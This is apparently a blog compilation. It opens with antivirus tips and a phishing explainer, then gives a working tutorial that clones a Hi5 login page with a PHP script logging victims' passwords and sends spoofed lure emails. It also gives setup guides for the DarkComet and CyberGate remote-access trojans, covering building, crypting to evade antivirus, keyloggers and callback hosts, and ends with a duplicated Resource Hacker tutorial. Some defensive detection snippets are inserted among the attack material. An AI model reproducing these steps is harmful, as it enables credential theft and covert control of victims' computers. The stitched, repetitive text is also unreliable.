Posted by Ramesh Nagar
Is your computer infected with a virus? Do you often get mysterious error messages? This is a common problem faced by computer users across the globe. There are many viruses and worms out there that could infect your computer. Some are harmless, but others have the capacity to do any number of nasty things, up to and including erasing all the data from your computer. There are, however, ways to keep viruses away from your PC. Here are 12 tips for maintaining a virus-free computer.
1. Email is one of the most common ways for your computer to catch a virus, so it is always recommended to stay away from SPAM. Open only those emails that originate from a trusted source, such as someone in your contact list. If you are using your own private email host (other than Gmail, Yahoo, Hotmail etc.), then it is highly recommended that you use good anti-spam software. And finally, NEVER click on any links in emails that come from untrusted sources.
2. USB thumb/pen drives are another common way by which viruses spread rapidly, so it is always a good habit to perform a virus scan before copying any data onto your computer. NEVER double-click the pen drive to open it, since that can trigger the drive's autorun entry. Instead, right-click on it and select the “Open” option. This is a safer way to open a pen drive.
3. Be careful about using MS Outlook. Outlook is more susceptible to worms than other e-mail programs unless you have efficient antivirus programs running. Use Pegasus or Thunderbird (by Mozilla), or a web-based program such as Hotmail or Yahoo (in Firefox).
4. As we all know, the Internet is the main source of malicious programs, including viruses, worms, trojans etc. In fact, the Internet contributes to virus infection by up to 80%. So here are some safe surfing habits that will help you ward off virus infection to the maximum extent.
• Don’t click on pop-up windows that announce a sudden disaster in your city or announce that you’ve won an hourly prize. They are ways to mislead Internet users and you should never trust them.
• You can also use a pop-up blocker to automatically block those pop-ups.
5. Most of us use search engines like Google to find what we are looking for. It is quite possible for a malicious website to get listed in the search results. To avoid visiting those untrusted, malicious websites, you can download and install AVG LinkScanner, which is freeware. This tool can be very handy and will help you stay away from malicious websites.
6. Install good antivirus software and keep it updated. Also perform a full system scan periodically. It is highly recommended that you turn on the automatic update feature. This is the most essential task for protecting your PC from viruses. If PC security is your first priority, then it is recommended that you go for shareware antivirus software over the free ones. Most antivirus products support an Auto-Protect feature that provides real-time protection for your PC. Make sure that this feature is turned on.
7. Install a good antispyware program that operates against Internet malware and spyware.
8. Never open any email attachments that come from untrusted sources. If it is a picture, text or sound file (these attachments end in the extensions .txt, .jpeg, .gif, .bmp, .tif, .mp3, .htm, .html, and .avi), you are probably safe, but still do a scan before opening it.
9. Do not use disks that other people gave you, even from work. The disk could be infected with a virus. Of course, you can run a virus scan on it first to check it out.
10. Set up Windows Update to automatically download patches and upgrades. This will allow your computer to automatically download any updates to both the operating system and Internet Explorer. These updates fix security holes in both pieces of software.
11. When you download files from untrusted websites/sources such as torrents, warez etc., make sure that you run a virus scan before executing them.
12. And finally, it is recommended not to visit websites that feature illegal/unwanted stuff such as cracks, serials, warez etc., since they contribute much to the spread of viruses and other malicious programs.
Posted by Ramesh Nagar
What is phishing?
Phishing is a technique by which an attacker obtains sensitive data such as usernames, passwords, credit card details etc. by claiming to be a trusted or genuine organisation/company.
The most common type of phishing is the fake login page. The basic methodology of this attack is described below.
1. Suppose an attacker wants to hack the Gmail/Yahoo/Facebook/bank account of the victim. The attacker creates a fake login page for that website. This fake login page looks exactly like the real/genuine login page.
2. The attacker then sends the link to that fake login page to the victim through an email or any other means. The sender's email ID is usually spoofed to give it an authentic look.
3. The victim clicks on the link, the fake login page appears in his browser and he enters his credentials in that page thinking that it is genuine.
4. The credentials, that is the username and password, go to the attacker. Hence the victim's account gets hacked.
5. The victim is then redirected to any webpage chosen by the attacker. Most probably the victim is redirected to the genuine website or to a page displaying an error.
I hope the idea is clear to you. This is the best method to hack anyone's Gmail/Yahoo/Orkut/Facebook/bank account. Creating a fake login page is very simple. Then it depends on the attacker's smartness how he manages to fool the victim into entering his credentials in the fake login page. Simply put, this attack depends on the attacker's intelligence as well as the victim's carelessness.
Countermeasures:
The obvious countermeasure is simply not to blindly enter your sensitive data in a webpage that looks exactly like a genuine/real page. Carefully check the URL. But URLs can also be spoofed. The protocol should be https (secure) instead of http. If you still have doubts, you should check the digital certificate of the website.
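As an added example (not part of the original post), the following Python applies the checks just described to a URL before any credentials are entered: it reports a non-https scheme, a userinfo '@' trick, a bare IP host, and a host that merely contains the expected brand name. The expected domain and the sample URLs are assumptions.

```python
# Added example: sanity checks on a login URL, from the defender's side.
import ipaddress
from urllib.parse import urlsplit


def registrable_domain(host: str) -> str:
    """'login.hi5.com' -> 'hi5.com'. Last two labels only; real code would
    consult the Public Suffix List for names like example.co.uk."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def check_login_url(url: str, expected_domain: str) -> list:
    """Return a list of warnings about the URL; an empty list means nothing looked off."""
    warnings = []
    parts = urlsplit(url)
    if parts.scheme != "https":
        warnings.append("not https (scheme is %r)" % (parts.scheme or "missing"))
    if parts.username is not None:
        # https://www.hi5.com@evil.example/ : the brand name is userinfo, not the host
        warnings.append("userinfo '@' trick: real host is " + (parts.hostname or "?"))
    host = parts.hostname or ""
    if not host:
        warnings.append("no host name in URL")
        return warnings
    try:
        ipaddress.ip_address(host)
        warnings.append("host is a bare IP address (%s), not %s" % (host, expected_domain))
        return warnings
    except ValueError:
        pass  # not an IP literal, carry on with the domain comparison
    expected = expected_domain.lower()
    actual = registrable_domain(host)
    if actual != expected:
        if expected in host:
            # www.hi5.com.evil.example : the brand appears as a subdomain of someone else
            warnings.append("'%s' is only a subdomain label; real domain is %s" % (expected, actual))
        else:
            warnings.append("host %s does not belong to %s" % (host, expected))
    return warnings


if __name__ == "__main__":
    # Constructed samples: the genuine login URL from the post plus three lookalikes.
    for sample in ("https://www.hi5.com/friend/login.do",
                   "http://www.hi5.com/friend/login.do",
                   "https://www.hi5.com.evil.example/login.php",
                   "https://www.hi5.com@evil.example/login.php",
                   "http://203.0.113.5/login.php"):
        print(sample, "->", check_login_url(sample, "hi5.com") or "looks fine")
```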
Phishing Tutorial
Creating a fake login page and some social engineering tricks.
1.) First part: Creating the Fake Login Page.
In this part of the tutorial I'm going to tell you how to make a fake login page.
This method works for most pages, but I have chosen Hi5 as an example.
Part 1:
First we create a PHP script that will save the passwords in a text file.
1.) Open Notepad and put in this code:
CODE
<?php
// Append every POSTed field to passwords.txt, then send the browser on to the real login page.
header('Location: http://www.hi5.com/friend/login.do');
$handle = fopen("passwords.txt", "a");
foreach ($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
2.) Now save this as phish.php
Note:
CODE
header('Location: http://www.hi5.com/friend/login.do');
This URL is where the victim is redirected after logging in to your fake page.
The best way to do this is to go to the original site (in this case Hi5) and try to log in without a username and password. Of course the site will then tell you that the username/password is incorrect. Now copy that URL and paste it into that part of the phish.php script. As you can see, Hi5 has "http://www.hi5.com/friend/login.do".
Now we have successfully created the script that will save the passwords in a text file, which will later be used to see the logged victims' passwords.
Part 2:
Now we go to http://www.hi5.com and right-click / View Source.
Now we need to find the place where the LOGIN button on the Hi5 page sends the user after clicking on it.
To do that we search for something like:
CODE
action=anything
In this case we have:
CODE
action="/friend/login.do"
We replace that part with:
CODE
action="phish.php"
Then we copy the whole source and save this file as login.php.
Now upload these 2 files (login.php and phish.php) to a webhost that supports PHP and you are ready to go. Just give your victim the link to your login.php file, and every time they log in, the PHP script will append to a file titled passwords.txt in the same directory as login.php and phish.php. Just open passwords.txt and you will see the passwords.
The phishing link should be something like this:
http://something.awa...e.com/login.php ---> Send this to your victim
And the txt file with the passwords like this:
http://something.awa...m/passwords.txt ---> View the passwords with this one.
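Added example, not from the original tutorial and written from the defender's side: given a page's URL and HTML, it lists every form holding a password field and where that form actually posts. The sample markup and the clone host clone.example are constructed; the clone reproduces the action swap from Part 2 above.

```python
# Added example: audit where a page's login forms really post.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Collect every <form> with its action and whether it holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._open = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            if (a.get("type") or "").lower() == "password":
                self._open["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def registrable_domain(host):
    """'www.hi5.com' -> 'hi5.com' (last two labels; a real tool would use the Public Suffix List)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def audit_login_forms(page_url, html, expected_domain):
    """One record per form containing a password field: the raw action, the
    absolute URL it resolves to, and whether that target is off-brand or not https."""
    parser = FormCollector()
    parser.feed(html)
    records = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        # '' or a relative action such as "phish.php" resolves against the page itself
        target = urljoin(page_url, form["action"])
        t = urlsplit(target)
        off_domain = registrable_domain(t.hostname or "") != expected_domain.lower()
        records.append({
            "action": form["action"],
            "posts_to": target,
            "suspicious": off_domain or t.scheme != "https",
        })
    return records


# Constructed login page markup (a stand-in for the real site's source).
GENUINE_HTML = """
<form action="/search" method="get"><input name="q"></form>
<form action="/friend/login.do" method="post">
  <input type="text" name="email">
  <input type="password" name="password">
  <input type="submit" value="LOGIN">
</form>
"""
# The tutorial's edit, applied verbatim to the copied source.
CLONED_HTML = GENUINE_HTML.replace('action="/friend/login.do"', 'action="phish.php"')

if __name__ == "__main__":
    for url, html in (("https://www.hi5.com/", GENUINE_HTML),
                      ("http://clone.example/login.php", CLONED_HTML)):
        for rec in audit_login_forms(url, html, "hi5.com"):
            print(url, "->", rec)
```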
1.) Second part: Deceiving the Victim.
Now in this part we are going to see how we can deceive our victims. The way I do it is like this.
1#. Go to your inbox and find a simple Hi5 Friend Request. Copy it like in the picture:
2#. Go to http://deadfake.com/Send.aspx, scroll down a little and paste the invitation like this:
3#
* Now select the "Accept Friend" line.
* Click the hyperlink button.
* Paste your phishing link there.
* Click the OK button.
See the pic for more:
4#
Now fill in the fields like this:
To: victimemail@dumb.com
From: info@hi5.com
Subject: Someone has sent you a hi5 Friend Request
Then enter the security code and click Send. The e-mail will look like it came from Hi5, except that it will redirect the victim to your phishing link instead of hi5.com.
The same can be done for Facebook and many more websites of your choice.
NOTE: There is a chance that the email won't be sent sometimes. So it would be best to send it to your own inbox just before you send it to your victim.
Well, that's it for today, boys and girls. I know it was a long tutorial, but believe me, it will be worth it once you master it. Let me know what you think.
Happy Phishing.
Posted by Ramesh Nagar
OK, in this thread I will show the people who don't know how to set up DarkComet RAT v3.0.
I will show how to set up the client and how to create a server with the best settings to run under the most diverse configurations and ensure there are no compatibility issues with the systems.
I also provide a package with some extra tools needed in the tutorial:
- I coded a very simple runtime crypter to show people how DarkComet can be encrypted without problems with a decent crypter. The detection rate is low; it is only detected by Avira and a-squared. In theory it can run under x64 systems and of course x86, and under all systems XP/Vista/Seven.
- I provide a little UPX GUI tool I found to compress the server and make its size only 250kb without breaking it. The tool is perfect for noobs: no command line.
- All comes configured and obviously clean and tested.
With all of that I only want to show people how DarkComet can work like a charm if it is configured correctly, how it is perfectly cryptable and how the server can be very light.
Download DarkComet RAT v3.0 package
As you may notice, English is not my first language, so don't start flaming about this.
OK, after you download the package, let's go.
After downloading the package I provide, extract it and open the folder; you will see this content in the folder. It contains the same as the official bundle offered by DarkCoderSC plus my crypter, the app to compress the server and the config files of DarkComet. You will notice the DarkComet RAT size is less than the original; that's because I compressed it with the compressor when I was testing it.
Execute DarkComet. You will see the main window of the program. As you can see, the author did a good job with the GUI.
The version I provide comes configured, so you will be ready to use it without troubles. The main part of the client is the general settings, where you can configure the appearance of the program and some other accessibility options. One important option here is the password: keep in mind that if it is wrong and not the same one you provided to the server, connection attempts will be refused. I'm sure the main reason we see a lot of noobs starting threads about DarkComet is that they don't type the correct password and make other simple mistakes like this. Pay attention to these little things.
In the socket list you will see the ports monitored by the client to establish the desired connections with the servers. As you can see, I configured it by default on port 1604 and with UPnP activated. If your router supports UPnP, port forwarding will be done automatically.
What do I mean by port forwarding?
To establish connections between the client and the server, the port must be open in the router; if not, the router will refuse all connection attempts and you will end up complaining that you don't receive any connections and that DarkComet is rubbish.
I will not explain here how to open the ports on your router (port forwarding); there are lots of guides on Google and I don't want to lose more time with it.
To add more listening ports, click on Listen in the menu or right-click the list view of the sockets in the socket list tab.
Click on Server Module and you will see the server builder.
Double-click on the left column settings-01 and you will see this message box, which ensures the settings I configured are loaded over the default settings.
The edit server mode is important to remember if you have in mind to crypt the server. RES mode is compatible with the vast majority of crypters; EOF mode is only compatible with crypters that support EOF data, like crypters that work with Bifrost.
In the password field you need to provide the same password configured in the client; if you don't type the same one, connections can't be established. The password I configured with the client is DarkComet.
The mutex is used to avoid running more than one instance of the server on the same computer, to avoid issues.
Here you can configure the IP where the server will connect: type the No-IP host you have and the port you forwarded correctly, which is open and used by the client.
Here you can configure the installation options of the server. The image shows the settings I recommend. Using the app path will ensure your server installs correctly on every system, including systems with limited user privileges. Otherwise the server will fail to install itself and will run from the directory where it is located. This is another very important setting to keep in mind: it is not a good scenario to run visibly on the desktop because the server was configured to install itself in system32 and failed because it didn't have the necessary privileges. The settings I recommend ensure the server will be stable and you won't lose connections. Change the name of the process and the folder if you want.
The other options aren't really important and are optional: you can decide to bind the file with another one or shield the server even more to ensure you don't lose connections, but I noticed that activating the persistence option of the shield makes the server unkillable even for yourself, so you won't be able to uninstall or close the server. Other options, like killing some Windows processes, I don't recommend.
You can also type a message that will be shown when the server is executed. It can be useful to confuse whoever executes it and make him believe it is corrupt or something like that, or, evidently, you can show him that he has been hacked by the supadupa hacker.
You can decide to activate the offline keylogger. If you forgot, like me, to activate it, it doesn't matter; you can activate it later.
Final step to get your server: you only need to click the Build button and that's all.
You will be asking why we don't compress the server in this step. The reason is that it doesn't seem to work very well and doesn't compress the server as much as we will compress it later, which will reduce the size of the server a lot.
Go to the UPX frontend folder and execute the upxfrontend exe. You will see that window. I think I configured it correctly, but if not, be sure it is configured as in this image of the app, or it will break your server and it will not work. Press Start Compression and you will see the server is reduced to only 250kb. It is very small considering the huge set of functions DarkComet has. Compare it with CyberGate, which has a lot fewer functions and yet the size of the server is the same.
This process can't be done after crypting the server: first the server needs to be packed and then crypted, or the server will be broken.
Go to the DarkComet Crypter folder and run the client. Click where it is indicated and press Encrypt; if you selected EOF data, check the EOF data box, otherwise it is not needed. After pressing Encrypt, and if it all worked correctly, you will receive this message box.
That's all. Now you have your server compressed and crypted, only 250kb and detected only by Avira and a-squared.
And it works like a charm.
Remember to use DarkComet wisely.
Posted by Ramesh Nagar
This is my first TuT (tutorial). Tell me how I did and comment to tell me how it went. If you have any questions or need help setting this up, send me a PM (private message). Thanks and good luck!
Sites we will use:
- Download CyberGate Here..
- http://www.no-ip.com/
The first thing you will need to download is CyberGate. You may use any version you would like: v1.07.5, v1.05.1, or v1.04.8. They all set up the same.
To download CyberGate, go to the site linked above and click the tab that says CYBERGATE RAT; after you click that, it should pop up a new tab.
On this tab look on the right side and click the tab that says RELEASES; here you can download the version of CyberGate you wish to hack with.
After you download CyberGate, extract the file and open it, but don't go any further.
Next you will need to go to http://www.no-ip.com/ and go to the DOWNLOAD tab. After you click the download tab, click Windows and go to the bottom of the page to download the DUC 2.2.1 client.
After you download the DUC 2.2.1 client, make an account on No-IP and verify your email. (Remember the info for your account; you will need it later.)
Once signed in to your verified account, go to ADD A HOST; there you will make a hostname. Do not mess with any other settings; just type your hostname and select no-ip.org in the drop-down list like so.
After you enter your hostname, go to the bottom of the page and click CREATE HOST.
Now X (exit) out of everything. We can now create our server in CyberGate.
Open CyberGate and go to Control Center, Start.
Next go to Control Center, DNS Console.
Here, you need to open the No-IP DUC 2.2.1 client (the download from No-IP) and sign in to it with your info from No-IP.com. After you sign in you will see a smiley face with glasses. Uncheck and check the box next to the smiley face until he blushes. When he blushes, keep it checked and X (exit) No-IP.
Next, fill in the information like I did above, then click Update until it says "Success : DNS Hostname Update Successful". After it says that, you can X (exit) the DNS Console box.
Now you are going to go to Start, Options, Select Listening Ports. Here you will decide which port you will use. It doesn't matter which port you use; you can use anything between 1 and 65535. I usually use 80, 82, or 999. It's your choice.
When you choose which port you want to use, type it in the top box and click the blue arrow pointing to the left.
After you set a port, type in your Connection Password and remember it. I suggest you use the same password as you did on No-IP.
After you choose a port and make a password, click Save.
Now you can start creating your server: go to Control Center, Builder, and Create Server.
First create a user. I usually just use 0 because it's the easiest. After you make one, highlight it with your mouse and click the blue arrow that says Forward.
The next tab is Connection. Highlight the default DNS and port, then delete it and ADD a new one, but put your IPv4 address:port you're using. If you don't know what your IPv4 address is, you can go back to DNS Console and auto-detect it, or go to Start and type cmd; once this is open, type ipconfig and it should be right there. It should look something like this: 10.0.0.14, but I just put random numbers in there. In the boxes to the right, put your user for identification and put the same password you used for your connection.
The next tab is Installation. Pretty much just copy what you see in this picture, but remember to click both the Random buttons plenty of times.
The next tab is a message box; this is optional.
The next tab is Keylogger. The only things you need checked are Active Keylogger and DELETE (Backspace). Those are the only two things to mess with, so I'm not going to put a picture.
The next tab is Anti-Debug. You usually check all of them unless you're running your server in anything other than a PC, like VMware or Sandboxie.
The last tab is Create Server. All you need are Use Icon and Compress With UPX checked on this. After you have all the tabs filled out, you can click Create Server and save the virus.
Now run it on your own computer and see if it works!
If it doesn't, you didn't do one of my steps correctly, but if you send me a PM I will help you fix these problems.
Good luck, and I hope I helped you out with this TuT!
Posted by Ramesh Nagar
What is CyberGate:
CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously being developed by our experienced team.
What it can do:
CyberGate was built to be a tool for various possible applications, ranging from assisting users with routine maintenance tasks to remotely monitoring your children, capturing regular user activities and maintaining a backup of your typed data automatically. It can also be used as a monitoring device for detecting unauthorized access.
CyberGate achieves this through its abundant array of features, a few of which are illustrated below:
[+] Automatically map ports if your router supports UPnP;
[+] Multi-threaded: allows multiple clients to be connected, along with increased reliability.
[+] Reverse connection: some of the listed advantages of a reverse connection -
# Outgoing connections are generally less threatening, and are less likely to be detected or blocked by a firewall, such as a router.
# Since the remote's computer is connecting to the remote administrator, one does not need to know the remote's IP address in order to connect.
# It is much easier to keep track of the computers the RAT is installed on, since they are all "calling home" by connecting to the remote administrator.
[+] User-friendly GUI: the neat and simple GUI of CyberGate makes this tool very easy to use and the simplest way to achieve your goals.
[+] Stealth: the various features of the server installation make the server extremely customizable according to each user's needs and requirements.
[+] Keylogger: this tool can be used to find out what is happening on your computer while you are away, and to maintain a backup of your typed data.
[+] Password recovery: it can be used to recover some of the passwords that you forgot a long time ago.
[+] Tasks: CyberGate is able to create tasks either for the client to perform at a specific time after being started, or for an individual remote whenever it connects back to CyberGate.
[+] Connections tab: you can monitor all the connections and client performance from a connection log that records actions and the time/date of those actions.
[+] File Manager with the ability to download, run, run as administrator, and so many others, plus the amazing option to see all images of a selected folder as thumbnails;
[+] It can also be used as a monitoring device for detecting unauthorized access.
... and so many other options and features!
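Added detection example (not from either post) covering the reverse connection described in this list and the DarkComet connection settings above: it reads constructed outbound-connection log lines and flags a source/destination/port triple that beacons at a steady interval, uses a dynamic-DNS host name such as no-ip.org, or uses DarkComet's default port 1604. The log format, the suffix list and the thresholds are assumptions.

```python
# Added example: spotting RAT "calling home" traffic in egress connection logs.
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed egress-firewall log in key=value form (hypothetical format).
SAMPLE_LOG = """\
2010-05-01T10:00:00 src=10.0.0.14 dsthost=victimbox.no-ip.org dport=1604 proto=tcp
2010-05-01T10:00:31 src=10.0.0.14 dsthost=victimbox.no-ip.org dport=1604 proto=tcp
2010-05-01T10:01:00 src=10.0.0.14 dsthost=victimbox.no-ip.org dport=1604 proto=tcp
2010-05-01T10:01:30 src=10.0.0.14 dsthost=victimbox.no-ip.org dport=1604 proto=tcp
2010-05-01T10:00:05 src=10.0.0.22 dsthost=www.example.com dport=443 proto=tcp
2010-05-01T10:07:41 src=10.0.0.22 dsthost=www.example.com dport=443 proto=tcp
2010-05-01T10:09:02 src=10.0.0.22 dsthost=www.example.com dport=443 proto=tcp
2010-05-01T10:30:15 src=10.0.0.22 dsthost=www.example.com dport=443 proto=tcp
2010-05-01T10:02:00 src=10.0.0.31 dsthost=updates.example.net dport=80 proto=tcp
"""

# Assumed, partial list of free dynamic-DNS suffixes; no-ip.org is the one the posts use.
DYNDNS_SUFFIXES = (".no-ip.org", ".no-ip.biz", ".ddns.net", ".hopto.org", ".zapto.org")
# DarkComet's default listening port from the post above; extend with whatever you track.
RAT_DEFAULT_PORTS = {1604}


def parse_line(line):
    """Turn 'TIMESTAMP key=value ...' into a dict with a datetime and an int port."""
    ts_text, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = datetime.fromisoformat(ts_text)
    rec["dport"] = int(rec["dport"])
    return rec


def is_regular_beacon(timestamps, min_hits=4, max_jitter=0.2):
    """True when there are at least min_hits connections and every gap between
    consecutive ones lies within max_jitter (as a fraction) of the median gap."""
    if len(timestamps) < min_hits:
        return False
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    typical = median(gaps)
    if typical <= 0:
        return False
    return all(abs(g - typical) / typical <= max_jitter for g in gaps)


def find_callbacks(log_text):
    """Group outbound connections by (src, dsthost, dport) and return alerts with reasons."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            rec = parse_line(line)
            groups[(rec["src"], rec["dsthost"], rec["dport"])].append(rec["ts"])
    alerts = []
    for (src, host, port), stamps in groups.items():
        reasons = []
        if host.lower().endswith(DYNDNS_SUFFIXES):
            reasons.append("dynamic-DNS destination")
        if port in RAT_DEFAULT_PORTS:
            reasons.append("known RAT default port %d" % port)
        if is_regular_beacon(stamps):
            reasons.append("regular beacon (%d hits)" % len(stamps))
        if reasons:
            alerts.append({"src": src, "dsthost": host, "dport": port, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in find_callbacks(SAMPLE_LOG):
        print(alert)
```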
How to get CyberGate:
CyberGate comes in two variants: a trial version and a private version distributed to customers only.
Currently there is only 1 edition for sale, with 3 more editions getting ready for sale in the next few weeks.
Editions:
[+] CyberGate Personal Edition (available)
[+] CyberGate Lite Edition (not available)
[+] CyberGate Professional Edition (not available)
[+] CyberGate Premium Edition (not available)
Posted by Ramesh Nagar
Before / After: screenshots of the Start button text before and after the change (images not included).
1. Open "%windir%\Explorer.exe" file in Resource Hacker.
2. Go to:
"String Table -> 37 -> 1033 -> 578" (If you are using Luna theme)
"String Table -> 38 -> 1033 -> 595" (If you are using Windows Classic theme)
3. You'll get a string "start". Just change it to whatever text you want to show. Make sure you keep the text in quotes.
4. Compile the script and save the file. That's it, you're done.
NOTE: To learn more about Resource Hacker, read the following.
This tutorial will help you understand this tool and will teach you how to use it. For your convenience, we have divided this tutorial into 2 parts:
- PART 1: BASIC INFORMATION
- PART 2: ADVANCED INFORMATION
[Using Resource Hacker] PART 1: BASIC INFORMATION
When you open a file in Resource Hacker, it shows various directories in the left-side pane, like:
- AVI - Contains AVI files
- Cursor - Contains Cursor files
- Bitmap - Contains BMP files
- Icon - Contains Icons
- Menu - Contains Menus
- Dialog - Contains Dialog boxes
- String Table - Contains Strings
- Accelerators - Contains Shortcut keys
- Version Info - Contains Version information of the file
[Viewing Resources]
You can view the resources present in the file by expanding the directory given in the left-side pane and clicking on the name of the resource. Each resource has 3 important attributes:
- Resource Type
- Resource Name
- Resource Language
For Icons / Cursors / Bitmaps:
1. First select the resource ( e.g. Bitmap -> 131 -> 1033 ).
2. Now click on Action -> Replace Icon or Cursor or Bitmap....
3. It'll open a new window, click on Open file with new Icon or Cursor or Bitmap button.
4. Select the desired resource using the OPEN dialog box, click on the Open button and then click on the Replace button.
For Other Resources like AVI:
1. Click on Action -> Replace Other Resource....
2. It'll open a new window, click on Open file with new resource button.
3. Select the file and click on Open button.
4. Now you'll need to provide the following required information for the resource, which we mentioned earlier:
- Resource Type: mention the type of the resource, e.g. if you are replacing an AVI file, mention the type as AVI
- Resource Name: provide the same name as the existing resource which you want to replace
- Resource Language: provide the language code for the resource, e.g. 1033 for English. You can check the existing resource's language code.
5. At last click on Replace button.
[For Menus / Strings / Dialogs]
To change any String, Menu or Dialog box, select the desired resource, e.g. String Table -> 4 -> 1033, make your changes and finally click on the Compile Script button.
It'll immediately compile the script. If you made any mistake while modifying the resource, it'll generate an error message so that you can fix it.
Adding New Bitmaps / Icons / Cursors / AVIs:
1. Click on Action -> Add a new Resource....
2. Now click on Open file with new resource button.
3. Select the desired resource and click on Open button.
4. Give the Resource Type, Name and Language as mentioned earlier. But keep in mind that the Resource Name should not match any existing resource's name.
5. At last click on Add Resource button.
Adding New Menus:
Go to the desired menu, e.g. Menu -> 215 -> 1033. Now add a new line anywhere inside POPUP "" using the following format:
[Inserting Newly Added Resources in Dialog Boxes]
Once you finish adding new Icons / Bitmaps / AVIs, you can insert them in any dialog box so that they show up in various Windows dialog boxes like RUN, the Progress dialog box, etc.
1. Go to the desired dialog box, e.g. Dialog -> 1020 -> 1033
2. Right-click in the dialog box and select the Insert Control option.
3. It'll open a new window. You'll see many controls in the new window, like BITMAP, LABEL, ICON, BUTTON, SysAnimate32 (for AVIs), etc.
4. Click on any desired control, e.g. to insert a Bitmap, click on the BITMAP control or to insert an AVI, click on SysAnimate32 control.
PS: You can also insert Date/Time in dialog box using SysDateTimePick32 control.
5. Don't forget to fill in the Caption entry. You need to enter the Resource Name in the Caption textbox, e.g. if you have added a Bitmap and set its Resource Name as 401, then give the same 401 in the Caption textbox.
PS: For AVI Control ( SysAnimate32 ), you'll need to append # in Caption value, e.g if the AVI name is 144, then put #144 in Caption textbox.
6. At last click on OK button & then Compile the script.
7. If you want to change the position of the new control in the dialog box, simply click on the control and drag it to your desired location, or you can also use the arrow keys to move it.
You can use scripts in 2 ways:
You can use the following commands in the Command Prompt to perform actions using Resource Hacker:
You can also run a series of commands using a script. First you'll need to create the script file using Notepad, and then you can run it using the following command:
Following is the required format of the script file:
- EXE= contains the source file name
- SaveAs= contains the output file name
- Log= contains the LOG file name, which will store a detailed log of the operation
- The [COMMANDS] section contains the command set which we want to perform on the source file.
PS: You can omit the LOG= entry in script file. In this case, Resource Hacker will automatically create a LOG file with the name "ResHacker.log".
1. Open "%windir%\Explorer.exe" file in Resource Hacker.
2. Go to:
"String Table -> 37 -> 1033 -> 578" (If you are using Luna theme)
"String Table -> 38 -> 1033 -> 595" (If you are using Windows Classic theme)
3. You'll get a string "start". Replace it with whatever text you want shown; make sure you keep the quotes.
4. Compile the script and save the file. That's it.
NOTE: To learn more about Resource Hacker, read the following.
This tutorial will help you understand this tool and will teach you how to use it. For your convenience, we have divided this tutorial into 2 parts:
- PART 1: BASIC INFORMATION
- PART 2: ADVANCED INFORMATION
PART 1: BASIC INFORMATION
[Using Resource Hacker]
When you open a file in Resource Hacker, it shows various directories in the left-side pane, such as:
- AVI - Contains AVI files
- Cursor - Contains Cursor files
- Bitmap - Contains BMP files
- Icon - Contains Icons
- Menu - Contains Menus
- Dialog - Contains Dialog boxes
- String Table - Contains Strings
- Accelerators - Contains Shortcut keys
- Version Info - Contains Version information of the file
[Viewing Resources]
You can view the resources present in the file by expanding a directory in the left-side pane and clicking on the name of a resource. Each resource has 3 important attributes:
- Resource Type
- Resource Name
- Resource Language
For Icons / Cursors / Bitmaps:
1. First select the resource ( e.g. Bitmap -> 131 -> 1033 ).
2. Now click on Action -> Replace Icon or Cursor or Bitmap....
3. It'll open a new window, click on Open file with new Icon or Cursor or Bitmap button.
4. Select the desired resource using OPEN dialog box, click on Open button and then click on Replace button.
For Other Resources like AVI:
1. Click on Action -> Replace Other Resource....
2. It'll open a new window, click on Open file with new resource button.
3. Select the file and click on Open button.
4. Now you'll need to provide the following information for the resource, which we mentioned earlier:
- Resource Type
- Resource Name
- Resource Language
Resource Type: Mention type of the resource, e.g. if you are replacing AVI file, mention the type as AVI
Resource Name: Provide the same name of the existing resource which you want to replace
Resource Language: Provide the language code for the resource, e.g. 1033 for English. You can check the language code of the existing resource.
5. At last click on Replace button.
[For Menus / Strings / Dialogs]
To change any String, Menu or Dialog box, Select the desired resource, e.g. String Table -> 4 -> 1033, make your changes and at last click on Compile Script button.
It'll immediately compile the script. If you made any mistake while modifying the resource, it'll generate an error message so that you can fix it.
PART 2: ADVANCED INFORMATION
[Adding New Resources]
Adding New Bitmaps / Icons / Cursors / AVIs:
1. Click on Action -> Add a new Resource....
2. Now click on Open file with new resource button.
3. Select the desired resource and click on Open button.
4. Give Resource Type, Name and Language as mentioned earlier. But keep in mind that Resource Name should not match with any existing resources name.
5. At last click on Add Resource button.
Adding New Menus:
Go to the desired menu, e.g. Menu -> 215 -> 1033. Now add a new line anywhere inside POPUP "" using the following format:
MENUITEM "Custom_String", 12345, MFT_STRING, MFS_GRAYED | MFS_DEFAULT
Where:
- "Custom_String" is the actual text which you want to show in the menu.
- 12345 is the identifier. It must be different from the existing menu items.
- MFS_GRAYED disables the menu item. You can change it to MFS_ENABLED if you want to show your menu item enabled.
- MFS_DEFAULT shows your menu item in BOLD. You can omit it.
- You can also add the attribute MFS_HILITE, which automatically selects your menu item.
Alternatively, you can just add:
MENUITEM "Custom_String", 12345
And Resource Hacker will automatically insert the other remaining values as mentioned above.
[Inserting Newly Added Resources in Dialog Boxes]
Once you finish adding new Icons / Bitmaps / AVIs, you can insert them in any dialog box so that you can show in various Windows dialog boxes like RUN, Progress Dialog box, etc.
1. Go to the desired dialog box, e.g. Dialog -> 1020 -> 1033
2. Right-click in the dialog box and select Insert Control option.
3. It'll open a new window. You'll see many controls in the new window, like BITMAP, LABEL, ICON, BUTTON, SysAnimate32 (for AVIs), etc.
4. Click on any desired control, e.g. to insert a Bitmap, click on the BITMAP control or to insert an AVI, click on SysAnimate32 control.
PS: You can also insert Date/Time in dialog box using SysDateTimePick32 control.
